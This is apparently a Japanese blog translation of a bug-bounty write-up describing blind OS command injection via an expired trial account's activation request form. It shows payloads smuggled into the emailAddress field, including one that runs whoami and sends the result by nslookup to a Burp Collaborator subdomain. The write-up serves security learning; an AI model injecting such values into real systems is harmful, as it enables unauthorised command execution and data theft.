Shikata Ga Nai

Private? There is no such things.

Blind OS Command Injection via Activation Requestを訳してみた

Hello there, ('ω')ノ

 

アクティブ化リクエストによるブラインド OS コマンド インジェクションを。

 

脆弱性:

 OSコマンドインジェクション

 

記事:

 https://medium.com/@alb-soul/blind-os-command-injection-via-activation-request-66dc25377bf4

 

今回は、アカウント アクティベーション リクエストを通じて

ブラインド OS コマンド インジェクションの脆弱性を発見した方法を。

 

OS コマンド インジェクションは、攻撃者がサーバに対して

オペレーティング システム (OS) コマンドを実行できるようにする

Web セキュリティの脆弱性で。

ping、echo などの OS コマンドでインジェクションされた際の

リクエストの応答で示され。

 

ブラインド OS コマンド インジェクションでは、

サイトが脆弱な場合がありますが、ターゲットが脆弱な場合は応答は表示されず。

ただし、Burpのコラボレータまたはリスナーによって検出することはできて。

今回、トライアルアカウントの有効期限が切れたときに、

アカウントアクティベーションリクエストフォームのメールアドレスと

電話番号フィールドで脆弱性が発生して。

 

実証実験:

有効期限が切れたアカウントでログインすると、ダッシュボードに

アクセスできなくなり、代わりにサービスを購入するための電子メールと

電話番号のフィールドが表示されたポップアップ アラートが表示されて。

 

トライアルの有効期限が切れた場合に、

アカウントのアクティベーション要求に対して発生するポップアップ

 

次に、電子メールと電話番号を入力し、[連絡先] ボタンをクリックして

アクティベーション リクエストを送信して。

Burp Suiteでは、以下のようにリクエスト履歴をRepeaterに送信して。

 

アカウント有効化のためのHTTPリクエスト

 

応答に時間遅延があるかどうかを確認するために、ping -c 10 127.0.0.1 のような

OS コマンドを挿入しようとしましたが、そうはいかず。

次に、このペイロードを使用して emailAddress 値を挿入して。

 

 mymail@mail.com & nslookup burpcollaborator_site_payload

 

Burp コラボレータ サイトのペイロードは、

右クリック ⇨ コラボレータ ペイロードの挿入で生成できるため、次のとおりで。

 

“emailAddress”:”mymail@mail.com & nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN &


ペイロードとともに送信された後

 

ペイロードを送信した後、応答には脆弱性があるかどうかは示されませんが、

[コラボレータ] タブに移動して [今すぐポーリング] ボタンをクリックすると、

ペイロードがトリガされて。

 

 

Best regards, (^^ゞ